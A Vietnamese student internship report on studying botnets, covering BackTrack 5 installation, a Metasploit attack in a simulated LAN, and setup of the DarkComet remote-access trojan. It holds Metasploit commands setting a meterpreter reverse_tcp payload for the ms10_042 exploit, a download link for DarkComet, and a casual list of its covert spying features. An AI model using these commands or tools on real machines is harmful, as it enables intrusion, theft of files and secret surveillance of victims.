Đề tài nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng
Trang 1ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng
GVHD: Võ Đỗ Thắng
Sinh viên thục hiện:
- Nguyễn Văn Luân
TP Hồ Chí Minh, tháng 8 năm 2014
Trang 21. Sự cần thiết của đề tài 2
2. Mục tiêu nghiên cứu 2
3. Phương pháp nghiên cứu 2
4. Kết cấu đề tài 2
LỜI CẢM ƠN 4
NHẬN XÉT CỦA GIÁO VIÊN 5
PHẦN 1 : GIỚI THIỆU VỀ BACKTRACK 5 6
1 Giới thiệu 6
2 Mục đích 6
3 Cài đặt 7
PHẦN 2: TRIỂN KHAI TRONG MÔI TRƯỜNG LAN 14
1 Mô phỏng mạng LAN 14
14
2 Thử nghiệm xâm nhập bằng Metasploit 14
PHẦN 3: XÂY DỰNG BOTNET BẰNG DARKCOMET 18
1 Giới thiệu DarkComet 18
2 Cài đặt DarkComet 18
HƯỚNG PHÁT TRIỂN 35
KẾT LUẬN 36
TÀI LIỆU THAM KHẢO 37
Trang 3Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 2
LỜI MỞ ĐẦU
1 Sự cần thiết của đề tài
Trong các kiểu tấn công hệ thống trên internet, tấn công DDoS (Distributed Denial of Service) là cách tấn công đơn giản, hiệu quả và khó phòng chống bậc nhất DDoS là cách tấn công dựa vào việc gửi số lượng lớn yêu cầu (request) đến hệ thống nhằm
chiếm dụng tài nguyên, làm cho hệ thống quá tải, không thể tiếp nhận và phục vụ các yêu cầu từ người dùng thực sự Ví dụ điển hình là vào tháng 7 năm 2013, hàng loạt các trang báo điện tử của Việt Nam như Vietnamnet, Tuổi Trẻ Online, Dân Trí, Thanh niên Online bị tấn công dẫn đến không thể truy cập được trong nhiều tuần lễ liên tiếp Theo thống kê từ Abort Network, đầu năm 2014 có hơn 100 vụ tấn công DDoS trên
100Gbps, 5733 vụ tấn công đạt 20Gbps gấp hơn hai lần năm 2013
Để có thể tạo được số lượng yêu cầu đủ lớn để đánh sập hệ thống mục tiêu, các hacker thường gây dựng mạng lưới zombie, botnet với số lượng có thể lên đến hàng triệu máy
Vì vậy, nghiên cứu về cách xây dựng mạng lưới zombie, botnet sẽ giúp chúng ta hiểu hơn về cách hoạt động, từ đó xây dựng các biện pháp phòng ngừa sự phát triển của hệ thống zombie, botnet
2 Mục tiêu nghiên cứu
Đề tài nghiên cứu trên hai môi trường:
Giai đoạn 1: Trong môi trường mạng LAN, tìm ra được các lỗ hổng bảo mật trên các
máy trong mạng, thử xâm nhập trên các máy
Giai đoạn 2: Trong môi trường Internet, dùng DarkComet để thử tạo, phát tán và điểu
khiển mạng lưới botnet thông qua mạng Internet
3 Phương pháp nghiên cứu
Giai đoạn 1: Sử dụng ảo hóa VMware để mô phỏng môi trường mạng LAN Cài đặt
Backtrack trên một máy ảo VMware Sau đó thực hiện thâm nhập từ máy Backtrack tới một mục tiêu
Giai đoạn 2: Cài đặt và tạo bot trên VPS (Virtual Private Server) và phát tán trên
mạng Sau đó thực hiện xâm nhập, kiểm soát từ xa thông qua địa chỉ IP public của
VPS
4 Kết cấu đề tài
Phần 1: Giới thiệu về Backtrack 5
Phần 2: Triển khai trong môi trường LAN
Trang 4Phần 3: Triển khai xây dựng botnet bằng DarkComet
Kết luận
Qua thời gian học tập và nghiên cứu trên ghế nhà trường cùng với sự hỗ trợ tận tình của
Thầy cô, bạn bè và người thân đã giúp em thu thập được nhiều kiến thức quý báo Đặc biệt
là quá trình thực tập tại Trung tâm ATHENA giúp chúng em có những trải nghiệm vô cùng thú vị và bổ ích Với mong muốn tìm hiểu về mạng máy tính và góp phần xây dựng một mạng máy tính thân thiện, thông minh cho mọi người sử dụng
Tuy đã có rất nhiều cố gắng song không thể tránh những khuyết điểm, sai sót Vì thế mong được sự thông cảm và những ý kiến đóng góp quý báo từ Quý Thầy Cô, bạn bè, bạn đọc để chúng em có thể ngày một hoàn thiện đề tài đã chọn một cách tốt hơn nữa Xin chân thành cảm ơn
Trang 5Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 4
LỜI CẢM ƠN
Thực tập là quá trình tham gia học hỏi, so sánh, nghiên cứu và ứng dụng
những kiến thức đã học vào thực tế công việc ở các cơ quan quản lý hành chính nhà nước và các công việc sau này Với nhiều kiến thức còn bỡ ngỡ của một sinh viên năm cuối, chuyên ngành công nghệ
thông tin trường Đại học Tài Nguyên Và Môi Trường TPHCM, chúng em đã được tham gia trong suốt quá trình thực tập tại trung tâm Athena
Tại đây chúng em đã nhận được nhiều sự hỗ trợ và giúp đỡ của các bạn bè đồng nghiệp và đặc biệt là
sự tận tình, chu đáo của thầy Võ Đỗ Thắng, giám đốc Trung tâm đào tạo và quản trị mạng an ninh quốc
tế Cùng với sự hỗ trợ từ phía nhà trường, xin gởi lời cảm ơn chân thành đến quý Thầy Cô khoa công nghệ thông tin trường Đại học Tài Nguyên Và Môi Trường TPHCM đã tạo điều kiện tốt nhất để chúng
em hoàn thành khóa thực tập này
Với sự nỗ lực của bản thân và sự hỗ trợ giúp đỡ, kiến thức ban đầu vẫn còn nhiều hạn chế, vì vậy
không tránh khỏi những thiếu sót trong quá trình hoàn thành báo cáo Mong nhận được nhiều đóng góp ý kiến của quý Thầy Cô cũng như nhiều bạn cùng chuyên môn để có thể nắm vững kiến thức hơn Sau cùng, chúng em xin kính chúc quý Thầy Cô trong Khoa Công Nghệ Thông Tin và Thầy Võ Đỗ Thắng lời chúc sức khỏe, niềm tin để tiếp tục thực hiện sứ mệnh cao đẹp của mình_ truyền đạt kiến thức cho thế hệ mai sau
Trang 6XÁC NHẬN CỦA CƠ QUAN THỦ TRƯỞNG
(ký tên, đóng dấu)
NHẬN XÉT CỦA GIÁO VIÊN
… , ngày….tháng….năm 2014 CÁN BỘ HƯỚNG DẪN
(ký tên)
Trang 7Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 6
PHẦN 1 : GIỚI THIỆU VỀ BACKTRACK 5
1 Giới thiệu
Backtrack là bản phân phối dựa trên GNU/LINUX Debian nhắm mục đích pháp y kỹ thuật số và sử dụng thử nghiệm thâm nhập.Việc phân phối Backtrack có nguồn gốc từ
sự hợp nhất của hai phân phối trước đây là cạnh tranh mà tập trung vào thử nghiệm
thâm nhập: WHAX và Auditor Security Collection
2 Mục đích
Backtrack 5 có các công cụ được sử dụng cho quá trình thử nghiệm xâm nhập Các
công cụ kiểm tra xâm nhập trong backtrack 5 có thể được phân loại như sau :
1 Information gathering: loại này có chứa một số công cụ có thể được sử dụng
để có được thông tin liên quan đến mục tiêu DNS,định tuyến, địa chỉ email,trang web,máy chủ mail…Thông tin này được thu thập từ các thông tin có sẵn trên internet,mà không cần chạm vào môi trường mục tiêu
2 Network mapping: loại này chứa một số công cụ có thể được sử dụng để có
kiểm tra các host đang tôn tại,thông tin về OS,ứng dụng được sử dụng bởi mục tiêu,và cũng làm portscanning
3 Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các
công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco Nó cũng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB)
và Simple Network Management Protocol (SNMP)
4 Web application analysis: loại này chứa các công cụ có thể được sử dụng
trong theo dõi, giám sát các ứng dụng web
5 Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận
dạng tần số vô tuyến (RFID)
6 Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các
lỗ hổng tìm thấy trong các máy tính mục tiêu
7 Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các
máy tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng cao đặc quyền của chúng ta cho các đặc quyền cao nhất
8 Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong
việc duy trì quyền truy cập vào các máy tính mục tiêu Chúng ta có thể cần
để có được những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để duy trì quyền truy cập
9 Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các
công cụ trong thể loại này
Trang 810 Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ
có thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc các tập tin, và phân tích hình ảnh đĩa cứng Để sử dụng các công cụ cung cấp trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình đơn khởi động Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các tập tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn
11 Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để
gỡ rối chương trình một hoặc tháo rời một tập tin thực thi
3 Cài đặt
Chúng ta có thể tải bản Backtrack 5 tại địa chỉ:
www.backtrack-linux.org/downloads/, có bản cho Vmware và file ISO
1 Live DVD
Nếu chúng ta muốn sử dụng Backtrack mà không cần cài nó vào ổ cứng, chúng ta có thể ghi tập tin ảnh ISO vào đĩa DVD, và khởi động máy tính của chúng ta với DVD Backtrack sau đó sẽ chạy từ đĩa DVD Lợi thế của việc sử dụng Backtrack là một DVD Live là nó là rất dễ dàng để làm và chúng ta không cần phải gây rối với cấu hình máy hiện tại của chúng ta
Tuy nhiên, phương pháp này cũng có một số nhược điểm Backtrack có thể không làm việc với phần cứng, và thay đổi cấu hình nào được thực hiện trên phần cứng để làm việc sẽ không được lưu với đĩa DVD Live Ngoài ra, nó
là chậm, vì máy tính cần phải tải các chương trình từ đĩa DVD
2 Install
Cài đặt trong máy thật Chúng ta cần chuẩn bị một phân vùng để cài đặt Backtrack Sau đó chạy Backtrack Live DVD Khi gặp màn hình login, ta sử dụng username là root, pass là toor Sau đó để vào chế độ đồ họa, ta gõ startx và ta sẽ vào chế độ đồ họa của Backtrack 5
Để cài đặt Backtrack 5 đến đĩa cứng ta chọn tập tin có tên install.sh trên desktop và tiến hành cài đặt Tuy nhiên, nếu không thể tìm thấy tập tin, chúng ta có thể sử dụng ubiquity để cài đặt Để sử dụng ubiquity, ta mở Terminal gõ ubiquity Sau đó cửa sổ cài đặt sẽ hiển thị Sau đó trả lời 1 số
Trang 9Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 8
câu hỏi như thành phố chúng ta đang sống, keyboard layout, phân vùng ổ đĩa cài đặt,… Sau đó tiến hành cài đặt
Cài đặt trong máy ảo Điểm thuận lợi là ta không cần chuẩn bị một phân vùng cho Backtrack, và
sử dụng đồng thời một OS khác Khuyết điểm là tốc độ chậm, không dùng được wireless trừ USB wireless
Ta có thể có thể sử dụng file VMWare được cung cấp bởi BackTrack Từ đây chúng ta có BackTrack trên máy ảo thật dễ dàng và nhanh chóng Cấu hình trong file VMWare là memory 768MB, hardisk :30GB, Network:NAT
Để sử dụng được card mạng thật, ta phải chọn Netword là Briged Dưới đây làm một số hình ảnh khi cài BackTrack trên máy ảo VMWare
Tạo một máy ảo mới và cho đia BackTrack vào
Trang 10Giao diện khởi động của BackTrack
Gõ startx để vào chế độ đồ họa trong BackTrack
Trang 11Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 10
Để cài đặt, click chọn vào file Install BackTrack trên màn hình Desktop
Trang 12Chọn ngôn ngữ, chọn Tiếp để tiếp tục
Chọn múi giờ, chọn Tiếp để tiếp tục
Trang 13Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 12
Chọn ngôn ngữ bàn phím, chọn Forward để tiếp tục
Chọn phân vùng để cài, chọn Tiếp để tiếp tục
Trang 14Nhấn Cài đặt để bắt đầu cài
Quá trình cài đã bắt đầu
Sau khi hoàn tất, chúng ta khởi động lại
Trang 15Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 14
PHẦN 2: TRIỂN KHAI TRONG MÔI TRƯỜNG
LAN
1 Mô phỏng mạng LAN
Mô hình mạng LAN được mô phỏng:
Để chỉ định máy ảo sử dụng Bridge ảo VMnet0, trong giao diện VMware, kích
chuột phải vào tên máy ảo, chọn Setting…, trong tab Hardware, chọn mục Network Adapter, sau đó trong mục Network Connection, chọn tùy chọn Bridged
2 Thử nghiệm xâm nhập bằng Metasploit
Trong Backtrack5r3, chúng ta sử dụng công cụ Metasploit để thực hiện xâm nhập
Để khởi động giao diện Console của Metasploit, trong Terminal, gõ lệnh
msfconsole
Switch
Trang 16Để sử dụng một module nào đó, chúng ta sử dụng cú pháp:
use <Đường dẫn đến module>
VD: khai thác lỗi ms10_042
Sử dụng lệnh search ms10_042 để tìm ra moudle cần dùng
Trang 17Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 16
use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec-> Enter
Các thiết lập:
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.101
Trang 19Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 18
PHẦN 3: XÂY DỰNG BOTNET BẰNG
DARKCOMET
1 Giới thiệu DarkComet
DarkComet là một công cụ quản trị từ xa (Remote Administrator Tool) miễn phí rất nổi tiếng, Tuy nhiên mình thấy Dark Comet là một soft đơn giản cực kì lợi hại và
nguy hiểm, với các tính năng như:
+ Remote Desktop Như TeamViewer nhưng không cần sự đồng ý
+ Xem các thư mục của máy victim, ăn cắp tài liệu từ máy victim
+ Có thể tạo, đọc và xóa các thư mục trong máy victim
+ Xem lén Webcam của victim
+ Nghe trộm qua microphone của victim
+ Mở website bất kì mà không cần sự đồng ý của victim
+ Chat với victim (cái này fê phết, victim còn đíu tắt được cơ)
+ Keylog có thể xem luôn hoặc về email
+ Xem regedit
+ Có thể sử dung chức năng ctrl + alt + del, Task Manager
+ Download file và chạy bình thường hoặc là ẩn ( Send sang máy victim thêm vài con trojan nữa chẳng hạn)
+ Khởi động cùng win con trojan đó…
Dự án DarkComet RAT đã phát hành bản chính thức cuối cùng là DarkComet RAT v5.4.1 Legacy vào ngày 1/10/2012
2 Cài đặt DarkComet
Bản darkcomet dùng trong báo cáo được tải từ:
http://www.mediafire.com/download/37bd1c0acbd2p6c/darkcomet+5.3.1.rar
Chạy DarkComet trên linux:
Tải bản DarkComet về, giải nén vào thư mục darkcomet5.3.1RAT dùng lệnh: unzip darkcomet5.3.1RAT
Mở terminal, chuyển thư mục làm việc hiện hành về darkcomet5.3.1RAT
Dùng lệnh wine darkcomet để khởi động DarkComet: wine darkcomet